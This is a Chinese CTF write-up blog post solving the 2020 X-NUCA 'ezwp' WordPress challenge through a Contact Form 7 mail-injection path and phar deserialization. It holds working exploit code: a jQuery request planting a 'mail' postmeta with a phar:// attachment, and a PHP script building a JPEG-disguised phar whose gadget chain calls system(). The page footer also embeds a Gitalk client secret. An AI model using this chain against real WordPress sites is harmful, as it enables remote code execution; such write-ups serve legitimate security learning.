<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  
  <title>2020xnuca_ezwp题解 | oxcccccc</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <meta name="description" content="2020 xnuca ezwp题解wpscan扫一波发现wp是最新版本 本地搭好环境后，登入后台发现，有个插件是n年前的版本，很明显漏洞点在这 漏洞分析：https:&#x2F;&#x2F;paper.seebug.org&#x2F;774&#x2F; 对wp和插件对比以下官方下载的，存在以下差异 文件对比wordpress&#x2F;wp-admin&#x2F;includes&#x2F;class-wp-screen.php 294行  官方 if ( isse">
<meta property="og:type" content="article">
<meta property="og:title" content="2020xnuca_ezwp题解">
<meta property="og:url" content="http://blog.ccreater.top/2020/12/14/2020xnuca_ezwp%E9%A2%98%E8%A7%A3/index.html">
<meta property="og:site_name" content="oxcccccc">
<meta property="og:description" content="2020 xnuca ezwp题解wpscan扫一波发现wp是最新版本 本地搭好环境后，登入后台发现，有个插件是n年前的版本，很明显漏洞点在这 漏洞分析：https:&#x2F;&#x2F;paper.seebug.org&#x2F;774&#x2F; 对wp和插件对比以下官方下载的，存在以下差异 文件对比wordpress&#x2F;wp-admin&#x2F;includes&#x2F;class-wp-screen.php 294行  官方 if ( isse">
<meta property="og:locale" content="zh">
<meta property="og:image" content="https://raw.githubusercontent.com/Explorersss/photo/master/20201208232404.png">
<meta property="article:published_time" content="2020-12-14T12:29:57.146Z">
<meta property="article:modified_time" content="2020-12-14T12:29:57.146Z">
<meta property="article:author" content="ccreater">
<meta property="article:tag" content="ctf">
<meta property="article:tag" content="web">
<meta property="article:tag" content="wp">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://raw.githubusercontent.com/Explorersss/photo/master/20201208232404.png">
  
    <link rel="alternate" href="/atom.xml" title="oxcccccc" type="application/atom+xml">
  
  
    <link rel="icon" href="/favicon.png">
  
  
  
<link rel="stylesheet" href="/css/style.css">

  
    
<link rel="stylesheet" href="/fancybox/jquery.fancybox.min.css">

  
<meta name="generator" content="Hexo 4.2.1"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">oxcccccc</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
          <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS Feed"></a>
        
        <a id="nav-search-btn" class="nav-icon" title="Search"></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="http://blog.ccreater.top"></form>
      </div>
    </div>
  </div>
</header>
      <div class="outer">
        <section id="main"><article id="post-2020xnuca_ezwp题解" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  <div class="article-meta">
    <a href="/2020/12/14/2020xnuca_ezwp%E9%A2%98%E8%A7%A3/" class="article-date">
  <time class="dt-published" datetime="2020-12-14T12:29:57.146Z" itemprop="datePublished">2020-12-14</time>
</a>
    
  <div class="article-category">
    <a class="article-category-link" href="/categories/%E6%AF%94%E8%B5%9B/">比赛</a>
  </div>

  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="p-name article-title" itemprop="headline name">
      2020xnuca_ezwp题解
    </h1>
  

      </header>
    
    <div class="e-content article-entry" itemprop="articleBody">
      
        <h1 id="2020-xnuca-ezwp题解"><a href="#2020-xnuca-ezwp题解" class="headerlink" title="2020 xnuca ezwp题解"></a>2020 xnuca ezwp题解</h1><p>wpscan扫一波发现wp是最新版本</p>
<p>本地搭好环境后，登入后台发现，有个插件是n年前的版本，很明显漏洞点在这</p>
<p>漏洞分析：<a href="https://paper.seebug.org/774/" target="_blank" rel="noopener">https://paper.seebug.org/774/</a></p>
<p>对wp和插件对比以下官方下载的，存在以下差异</p>
<h2 id="文件对比"><a href="#文件对比" class="headerlink" title="文件对比"></a>文件对比</h2><h3 id="wordpress"><a href="#wordpress" class="headerlink" title="wordpress"></a>wordpress</h3><p>/wp-admin/includes/class-wp-screen.php 294行</p>
<hr>
<p>官方</p>
<pre><code>if ( isset( $_GET[&#39;post&#39;] ) &amp;&amp; isset( $_POST[&#39;post_ID&#39;] ) &amp;&amp; (int) $_GET[&#39;post&#39;] !== (int) $_POST[&#39;post_ID&#39;] ) {
                        wp_die( __( &#39;A post ID mismatch has been detected.&#39; ), __( &#39;Sorry, you are not allowed to edit this item.&#39; ), 400 );
                    } elseif ( isset( $_GET[&#39;post&#39;] ) ) {
                        $post_id = (int) $_GET[&#39;post&#39;];
                    } elseif ( isset( $_POST[&#39;post_ID&#39;] ) ) {
                        $post_id = (int) $_POST[&#39;post_ID&#39;];
                    } else {
                        $post_id = 0;
                    }</code></pre><p>题目</p>
<pre><code>if ( isset( $_GET[&#39;post&#39;] ) ) {
                        $post_id = (int) $_GET[&#39;post&#39;];
                    } elseif ( isset( $_POST[&#39;post_ID&#39;] ) ) {
                        $post_id = (int) $_POST[&#39;post_ID&#39;];
                    } else {
                        $post_id = 0;
                    }</code></pre><hr>
<p>/wp-admin/includes/file.php 762行加了一个文件名不能包含php的waf（只检测了小写）</p>
<p>官方</p>
<pre><code>空</code></pre><p>题目</p>
<pre><code>if ( (stristr(file_get_contents($file[&#39;tmp_name&#39;]), &quot;php&quot;) !== FALSE) ) {
        return call_user_func_array( $upload_error_handler, array( &amp;$file, __( &#39;Sorry, this file content is not permitted for security reasons.&#39; ) ) );
    }</code></pre><hr>
<p>/wp-admin/includes/post.php 221</p>
<p>array_diff_key 参数少了’file’</p>
<p>官方</p>
<pre><code>return array_diff_key( $post_data, array_flip( array( &#39;meta_input&#39;, &#39;file&#39;, &#39;guid&#39; ) ) );</code></pre><p>题目</p>
<pre><code>return array_diff_key( $post_data, array_flip( array( &#39;meta_input&#39;, &#39;guid&#39; ) ) );</code></pre><hr>
<p>wp-admin/post.php 19行，少了很多条件</p>
<p>官方</p>
<pre><code>if ( isset( $_GET[&#39;post&#39;] ) &amp;&amp; isset( $_POST[&#39;post_ID&#39;] ) &amp;&amp; (int) $_GET[&#39;post&#39;] !== (int) $_POST[&#39;post_ID&#39;] ) {
    wp_die( __( &#39;A post ID mismatch has been detected.&#39; ), __( &#39;Sorry, you are not allowed to edit this item.&#39; ), 400 );
} elseif ( isset( $_GET[&#39;post&#39;] ) ) {
    $post_id = (int) $_GET[&#39;post&#39;];
} elseif ( isset( $_POST[&#39;post_ID&#39;] ) ) {
    $post_id = (int) $_POST[&#39;post_ID&#39;];
} else {
    $post_id = 0;
}</code></pre><p>题目</p>
<pre><code>if ( isset( $_GET[&#39;post&#39;] ) ) {
    $post_id = (int) $_GET[&#39;post&#39;];
} elseif ( isset( $_POST[&#39;post_ID&#39;] ) ) {
    $post_id = (int) $_POST[&#39;post_ID&#39;];
} else {
    $post_id = 0;
}</code></pre><p>wp-includes\Requests\Utility\FilteredIterator.php<br>删除了:</p>
<pre><code>public function unserialize( $serialized ) {
    }

    /**
     * @inheritdoc
     */
    public function __unserialize( $serialized ) { // phpcs:ignore PHPCompatibility.FunctionNameRestrictions.ReservedFunctionNames.MethodDoubleUnderscore,PHPCompatibility.FunctionNameRestrictions.NewMagicMethods.__unserializeFound
    }

    public function __wakeup() { // phpcs:ignore PHPCompatibility.FunctionNameRestrictions.ReservedFunctionNames.MethodDoubleUnderscore,PHPCompatibility.FunctionNameRestrictions.NewMagicMethods.__wakeupFound
        unset( $this-&gt;callback );
    }</code></pre><h3 id="contact-form-7"><a href="#contact-form-7" class="headerlink" title="contact form 7"></a>contact form 7</h3><p>原来：<br>134行：</p>
<pre><code>    return wp_mail( $recipient, $subject, $body, $headers, $attachments );
}</code></pre><p>题目：</p>
<pre><code>return $this-&gt;send_mail( $recipient, $subject, $body, $headers, $attachments );
    }

    public function send_mail($to, $subject, $message, $headers = &#39;&#39;, $attachments = array()) {
        try {
            $host = explode(&quot;@&quot;, $to)[1];
            $url = &quot;http://$host&quot;;
            $post_data = array(
                &quot;subject&quot; =&gt; $subject,
                &quot;message&quot; =&gt; $message,
                &quot;headers&quot; =&gt; $headers
            );
            if ($attachments !== array()) {
                if (!empty($attachments[0])) {
                    $post_data[&quot;file&quot;] = curl_file_create($attachments[0]);
                }
            }
            $ch = curl_init();
            curl_setopt($ch , CURLOPT_URL , $url);
            curl_setopt($ch , CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch , CURLOPT_POST, 1);
            curl_setopt($ch, CURLOPT_PROTOCOLS, CURLPROTO_HTTP);
            curl_setopt($ch , CURLOPT_POSTFIELDS, $post_data);
            $data = curl_exec($ch);
            curl_close($ch);
            if ($data) {
                file_put_contents(&quot;/tmp/1.log&quot;, $data);
            }
            return true;
        } catch (Exception $e) {
            return false;
        }
    }</code></pre><h2 id="思路"><a href="#思路" class="headerlink" title="思路"></a>思路</h2><p>跟以下之前的漏洞发现，漏洞点调用了wp_mail，而题目改成了send_mail，里面的存在文件系统相关的函数，加上题目删除反序列化的方法，大概率思路就是利用之前的漏洞+反序列化getshell</p>
<h2 id="绕过最新版本wp限制来利用历史漏洞"><a href="#绕过最新版本wp限制来利用历史漏洞" class="headerlink" title="绕过最新版本wp限制来利用历史漏洞"></a>绕过最新版本wp限制来利用历史漏洞</h2><p>利用原来的payload直接打过去发现不太行，跟踪发现：</p>
<p>/wp-admin/includes/post.php 221：</p>
<p><code>return array_diff_key( $post_data, array_flip( array( &#39;meta_input&#39;, &#39;guid&#39; ) ) );</code></p>
<p>最新版wp对post数据进行了过滤，删除了meta_input和guid的键，导致我们无法写入postmeta,继续跟踪发现有个地方可以用别的键写入postmeta:</p>
<p>/wp-admin/includes/post.php 872：</p>
<p><code>add_meta( $post_ID );</code></p>
<pre><code class="php">function add_meta( $post_ID ) {
    $post_ID = (int) $post_ID;

    $metakeyselect = isset( $_POST[&#39;metakeyselect&#39;] ) ? wp_unslash( trim( $_POST[&#39;metakeyselect&#39;] ) ) : &#39;&#39;;
    $metakeyinput  = isset( $_POST[&#39;metakeyinput&#39;] ) ? wp_unslash( trim( $_POST[&#39;metakeyinput&#39;] ) ) : &#39;&#39;;
    $metavalue     = isset( $_POST[&#39;metavalue&#39;] ) ? $_POST[&#39;metavalue&#39;] : &#39;&#39;;
    if ( is_string( $metavalue ) ) {
        $metavalue = trim( $metavalue );
    }

    if ( ( ( &#39;#NONE#&#39; !== $metakeyselect ) &amp;&amp; ! empty( $metakeyselect ) ) || ! empty( $metakeyinput ) ) {
        /*
         * We have a key/value pair. If both the select and the input
         * for the key have data, the input takes precedence.
         */
        if ( &#39;#NONE#&#39; !== $metakeyselect ) {
            $metakey = $metakeyselect;
        }

        if ( $metakeyinput ) {
            $metakey = $metakeyinput; // Default.
        }

        if ( is_protected_meta( $metakey, &#39;post&#39; ) || ! current_user_can( &#39;add_post_meta&#39;, $post_ID, $metakey ) ) {
            return false;
        }

        $metakey = wp_slash( $metakey );

        return add_post_meta( $post_ID, $metakey, $metavalue );
    }

    return false;
}</code></pre>
<p>但是这里有个is_protected_meta,跟进去发现这个函数限制了我们的键不能以<code>_</code>开头，按照原来的payload，到这里好像死路了。</p>
<p>但是我们跟踪以下插件渲染表单的代码发现</p>
<p>contact-form.php:129</p>
<p>class WPCF7_ContactForm</p>
<pre><code class="php">private function __construct( $post = null ) {
        $post = get_post( $post );

        if ( $post &amp;&amp; self::post_type == get_post_type( $post ) ) {
            $this-&gt;id = $post-&gt;ID;
            $this-&gt;name = $post-&gt;post_name;
            $this-&gt;title = $post-&gt;post_title;
            $this-&gt;locale = get_post_meta( $post-&gt;ID, &#39;_locale&#39;, true );

            $properties = $this-&gt;get_properties();

            foreach ( $properties as $key =&gt; $value ) {
                if ( metadata_exists( &#39;post&#39;, $post-&gt;ID, &#39;_&#39; . $key ) ) {
                    $properties[$key] = get_post_meta( $post-&gt;ID, &#39;_&#39; . $key, true );
                } elseif ( metadata_exists( &#39;post&#39;, $post-&gt;ID, $key ) ) {
                    $properties[$key] = get_post_meta( $post-&gt;ID, $key, true );
                }
            }

            $this-&gt;properties = $properties;
            $this-&gt;upgrade();
        }

        do_action( &#39;wpcf7_contact_form&#39;, $this );
    }</code></pre>
<p>contact form 的属性啥的就是从<code>$properties</code>中取出(<code>_mail</code>就在这里面)，想要利用历史漏洞我们必须能够控制<code>_mail</code>的值</p>
<p><code>metadata_exists( &#39;post&#39;, $post-&gt;ID, &#39;_&#39; . $key )</code>:它先会去表中查找<code>&quot;_&quot;.&quot;mail&quot;</code>这个属性，没有的话再去查找<code>&quot;mail&quot;</code>属性，正好我们前面找到一个可以控制非<code>_</code>开头的postmeta</p>
<p>于是构造</p>
<pre><code class="javascript">var settings = {
    &quot;async&quot;: true,
    &quot;crossDomain&quot;: true,
    &quot;url&quot;: &quot;/wp-admin/post.php?post=1&quot;,
    &quot;method&quot;: &quot;POST&quot;,
    &quot;data&quot;: {
        &quot;_wpnonce&quot;: document.getElementById(&quot;_wpnonce&quot;).value,
        &quot;_wp_http_referer&quot;: &quot;%2Fwp-admin%2Fpost-new.php&quot;,
        &quot;user_ID&quot;: &quot;3&quot;,
        &quot;action&quot;: &quot;post&quot;,
        &quot;originalaction&quot;: &quot;editpost&quot;,
        &quot;post_author&quot;: &quot;3&quot;,
        &quot;post_type&quot;: &quot;wpcf7_contact_form&quot;,
        &quot;original_post_status&quot;: &quot;auto-draft&quot;,
        &quot;auto_draft&quot;: &quot;&quot;,
        &quot;post_title&quot;: &quot;readflagtotmp2log&quot;,
        &quot;content&quot;: &quot;test&quot;,
        &quot;wp-preview&quot;: &quot;&quot;,
        &quot;hidden_post_status&quot;: &quot;draft&quot;,
        &quot;post_status&quot;: &quot;draft&quot;,
        &quot;hidden_post_password&quot;: &quot;&quot;,
        &quot;hidden_post_visibility&quot;: &quot;public&quot;,
        &quot;visibility&quot;: &quot;public&quot;,
        &quot;post_password&quot;: &quot;&quot;,
        &quot;mm&quot;: &quot;12&quot;,
        &quot;jj&quot;: &quot;22&quot;,
        &quot;_thumbnail_id&quot;: &quot;-1&quot;,
        &quot;advanced_view&quot;: &quot;1&quot;,
        &quot;comment_status&quot;: &quot;open&quot;,
        &quot;ping_status&quot;: &quot;open&quot;,
        &quot;post_name&quot;: &quot;&quot;,
        &quot;metakeyinput&quot;:&quot;mail&quot;,
        &quot;metavalue[subject]&quot;: &quot;test \&quot;[your-subject]\&quot;&quot;,
        &quot;metavalue[sender]&quot;: &quot;2&quot;,
        &quot;metavalue[recipient]&quot;: &quot;ccreater@172.16.8.6:60000&quot;,
        &quot;metavalue[body]&quot;: &quot;From: [your-name] &lt;[your-email]&gt;\\nSubject: [your-subject]\\n\\nMessage Body:\\n[your-message]\\n\\n-- \\n&quot;,
        &quot;metavalue[additional_headers]&quot;: &quot;Reply-To: [your-email]&quot;,
        &quot;metavalue[attachments]&quot;: &quot;phar://./wp-content/uploads/2020/12/phar.jpg&quot;,
        &quot;metavalue[use_html]&quot;: &quot;false&quot;,
        &quot;metavalue[exclude_blank]&quot;: &quot;false&quot;,
        &quot;metakeyselect&quot;:&quot;#NONE#&quot;

    }
}
jQuery.ajax(settings).done(function (response) {
    console.log(response);
});</code></pre>
<p>在dashboard那里执行这个js</p>
<p>成功写入<code>mail</code>:</p>
<p><img src="https://raw.githubusercontent.com/Explorersss/photo/master/20201208232404.png" alt="image8421"></p>
<p>因为没有<code>_form</code>属性（上面那个设置postmeta的一次只能设置一个），所以我们要手动提交<code>jQuery(&quot;.wpcf7-form&quot;).submit()</code>，接着就可以读取文件和反序列化了</p>
<h2 id="反序列化"><a href="#反序列化" class="headerlink" title="反序列化"></a>反序列化</h2><pre><code class="php">&lt;?php

namespace Kigkonsult\Icalcreator{
    class Vtimezone{
        public $timezonetype;
        public $components;
        public function __construct($val)
        {
            $this-&gt;components = $val;
        }
    }
}
namespace {

    require( &#39;wp-load.php&#39; );  //???????
    require_once( dirname( __FILE__ ) . &#39;/wp-includes/Requests/Utility/FilteredIterator.php&#39; );
    $arr  = array(
        &quot;1&quot; =&gt; &quot;/readflag&gt;/tmp/2.log&quot;  //payload
    );
    $obj_ = new Requests_Utility_FilteredIterator( $arr, &quot;system&quot; );
    $obj  = new Kigkonsult\Icalcreator\Vtimezone( $obj_ );


    @unlink( &quot;test.gif&quot; );
    $phar = new Phar( &quot;test.phar&quot; );
    $phar-&gt;startBuffering();
    $phar-&gt;setStub( base64_decode( &quot;/9j/4AAQSkZJRgABAgEASABIAAD//gARSlBFRyBJbWFnZXIgMi4x/9sAhAAGBAUGBQQGBgUGBwcGCAoQCgoJCQoUDg8MEBcUGBgXFBYWGh0lHxobIxwWFiAsICMmJykqKRkfLTAtKDAlKCkoAQMEBAUE&quot; ) . &quot; __HALT_COMPILER(); ?&gt;&quot; );
    $phar-&gt;setMetadata( $obj );
    $phar-&gt;addFromString( &quot;test.txt&quot;, &quot;test&quot; ); //????????
    //??????
    $phar-&gt;stopBuffering();
    rename( &quot;test.phar&quot;, &quot;test.gif&quot; );
}
</code></pre>
<p><strong>本文作者</strong>：ccreater<br/><strong>本文地址</strong>： <a href="http://blog.ccreater.top/2020/12/14/2020xnuca_ezwp题解/">http://blog.ccreater.top/2020/12/14/2020xnuca_ezwp题解/</a> <br/><strong>版权声明</strong>：本博客所有文章除特别声明外，均采用 BY-NC-SA 许可协议。转载请注明出处</p>

      
    </div>
    <footer class="article-footer">
      <a data-url="http://blog.ccreater.top/2020/12/14/2020xnuca_ezwp%E9%A2%98%E8%A7%A3/" data-id="ckiojbub80000y0vd6w4ge78v" data-title="2020xnuca_ezwp题解" class="article-share-link">Share</a>
      
	  
			  
				  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.css">
  <script src="https://cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.min.js"></script>
  <script src="/js/md5.min.js"></script>
<div id="gitalk-container"></div>
<script type="text/javascript">
    var gitalk = new Gitalk({
        clientID: '3fd4b7c51e3cfe6d1f43',
        clientSecret: 'e3b1162bfd0bc86431672a764a8c801b4dc97929',
        id: md5(window.location.pathname),
        repo: 'Explorersss.github.io',
        owner: 'Explorersss',
        admin: 'Explorersss',
        distractionFreeMode: 'true'
    })
    gitalk.render('gitalk-container')
</script>
				
	  
      
      
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/ctf/" rel="tag">ctf</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/web/" rel="tag">web</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/wp/" rel="tag">wp</a></li></ul>

    </footer>
  </div>
  
    
<nav id="article-nav">
  
  
    <a href="/2020/11/27/2020%20balsn%20ctf%20web%20%E9%83%A8%E5%88%86%E9%A2%98%E8%A7%A3/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title">2020 balsn ctf web 部分题解</div>
    </a>
  
</nav>

  
</article>




</section>
        
          <aside id="sidebar">
  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Categories</h3>
    <div class="widget">
      <ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/cve%E5%A4%8D%E7%8E%B0/">cve复现</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/web/">web</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/">做题笔记</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E6%9D%82/">杂</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E6%AF%94%E8%B5%9B/">比赛</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E6%B8%97%E9%80%8F/">渗透</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E6%BC%8F%E6%B4%9E%E6%8C%96%E6%8E%98/">漏洞挖掘</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E7%BC%96%E7%A8%8B/">编程</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E9%9D%B6%E5%9C%BA/">靶场</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tags</h3>
    <div class="widget">
      <ul class="tag-list" itemprop="keywords"><li class="tag-list-item"><a class="tag-list-link" href="/tags/LFI/" rel="tag">LFI</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/RCE/" rel="tag">RCE</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/SpEL/" rel="tag">SpEL</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/ctf/" rel="tag">ctf</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/ctf-wp/" rel="tag">ctf,wp</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/cve%E5%A4%8D%E7%8E%B0/" rel="tag">cve复现</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/django/" rel="tag">django</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/htb/" rel="tag">htb</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/java/" rel="tag">java</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/js/" rel="tag">js</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/misc/" rel="tag">misc</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/php/" rel="tag">php</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/python/" rel="tag">python</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/web/" rel="tag">web</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/wp/" rel="tag">wp</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/xss/" rel="tag">xss</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/" rel="tag">内网渗透</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%87%BA%E9%A2%98%E7%AC%94%E8%AE%B0/" rel="tag">出题笔记</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%9F%9F%E6%B8%97%E9%80%8F/" rel="tag">域渗透</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%A4%8D%E7%8E%B0/" rel="tag">复现</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/" rel="tag">学习笔记</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%B0%8F%E5%B7%A5%E5%85%B7/" rel="tag">小工具</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%B7%A5%E5%85%B7/" rel="tag">工具</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E6%9D%82/" rel="tag">杂</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E6%AF%94%E8%B5%9B/" rel="tag">比赛</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E6%B8%97%E9%80%8F/" rel="tag">渗透</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E6%BC%8F%E6%B4%9E%E6%8C%96%E6%8E%98/" rel="tag">漏洞挖掘</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E7%BA%BF%E4%B8%8A%E8%B5%9B/" rel="tag">线上赛</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E7%BC%96%E7%A8%8B/" rel="tag">编程</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E8%AE%B0%E5%BD%95/" rel="tag">记录</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E9%9D%B6%E5%9C%BA/" rel="tag">靶场</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tag Cloud</h3>
    <div class="widget tagcloud">
      <a href="/tags/LFI/" style="font-size: 10px;">LFI</a> <a href="/tags/RCE/" style="font-size: 10px;">RCE</a> <a href="/tags/SpEL/" style="font-size: 10px;">SpEL</a> <a href="/tags/ctf/" style="font-size: 20px;">ctf</a> <a href="/tags/ctf-wp/" style="font-size: 11.67px;">ctf,wp</a> <a href="/tags/cve%E5%A4%8D%E7%8E%B0/" style="font-size: 15px;">cve复现</a> <a href="/tags/django/" style="font-size: 10px;">django</a> <a href="/tags/htb/" style="font-size: 10px;">htb</a> <a href="/tags/java/" style="font-size: 11.67px;">java</a> <a href="/tags/js/" style="font-size: 10px;">js</a> <a href="/tags/misc/" style="font-size: 10px;">misc</a> <a href="/tags/php/" style="font-size: 11.67px;">php</a> <a href="/tags/python/" style="font-size: 10px;">python</a> <a href="/tags/web/" style="font-size: 16.67px;">web</a> <a href="/tags/wp/" style="font-size: 18.33px;">wp</a> <a href="/tags/xss/" style="font-size: 10px;">xss</a> <a href="/tags/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/" style="font-size: 10px;">内网渗透</a> <a href="/tags/%E5%87%BA%E9%A2%98%E7%AC%94%E8%AE%B0/" style="font-size: 10px;">出题笔记</a> <a href="/tags/%E5%9F%9F%E6%B8%97%E9%80%8F/" style="font-size: 11.67px;">域渗透</a> <a href="/tags/%E5%A4%8D%E7%8E%B0/" style="font-size: 10px;">复现</a> <a href="/tags/%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/" style="font-size: 10px;">学习笔记</a> <a href="/tags/%E5%B0%8F%E5%B7%A5%E5%85%B7/" style="font-size: 13.33px;">小工具</a> <a href="/tags/%E5%B7%A5%E5%85%B7/" style="font-size: 10px;">工具</a> <a href="/tags/%E6%9D%82/" style="font-size: 11.67px;">杂</a> <a href="/tags/%E6%AF%94%E8%B5%9B/" style="font-size: 10px;">比赛</a> <a href="/tags/%E6%B8%97%E9%80%8F/" style="font-size: 10px;">渗透</a> <a href="/tags/%E6%BC%8F%E6%B4%9E%E6%8C%96%E6%8E%98/" style="font-size: 10px;">漏洞挖掘</a> <a href="/tags/%E7%BA%BF%E4%B8%8A%E8%B5%9B/" style="font-size: 10px;">线上赛</a> <a href="/tags/%E7%BC%96%E7%A8%8B/" style="font-size: 11.67px;">编程</a> <a href="/tags/%E8%AE%B0%E5%BD%95/" style="font-size: 10px;">记录</a> <a href="/tags/%E9%9D%B6%E5%9C%BA/" style="font-size: 10px;">靶场</a>
    </div>
  </div>

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/12/">December 2020</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/11/">November 2020</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/10/">October 2020</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/09/">September 2020</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/08/">August 2020</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/07/">July 2020</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/06/">June 2020</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/05/">May 2020</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/04/">April 2020</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/03/">March 2020</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/02/">February 2020</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/01/">January 2020</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/12/">December 2019</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/11/">November 2019</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/10/">October 2019</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2020/12/14/2020xnuca_ezwp%E9%A2%98%E8%A7%A3/">2020xnuca_ezwp题解</a>
          </li>
        
          <li>
            <a href="/2020/11/27/2020%20balsn%20ctf%20web%20%E9%83%A8%E5%88%86%E9%A2%98%E8%A7%A3/">2020 balsn ctf web 部分题解</a>
          </li>
        
          <li>
            <a href="/2020/11/24/2020%E7%A5%A5%E4%BA%91%E6%9D%AFweb%E9%A2%98%E8%A7%A3/">2020祥云杯web题解</a>
          </li>
        
          <li>
            <a href="/2020/11/13/XNUCA_2020_oooooooldjs%E9%A2%98%E8%A7%A3/">XNUCA_2020_oooooooldjs题解</a>
          </li>
        
          <li>
            <a href="/2020/11/12/Academy_write_up/">Academy_write_up</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      &copy; 2020 ccreater<br>
      Powered by <a href="https://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>

    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    


<script src="/js/jquery-3.4.1.min.js"></script>



  
<script src="/fancybox/jquery.fancybox.min.js"></script>




<script src="/js/script.js"></script>





  </div>
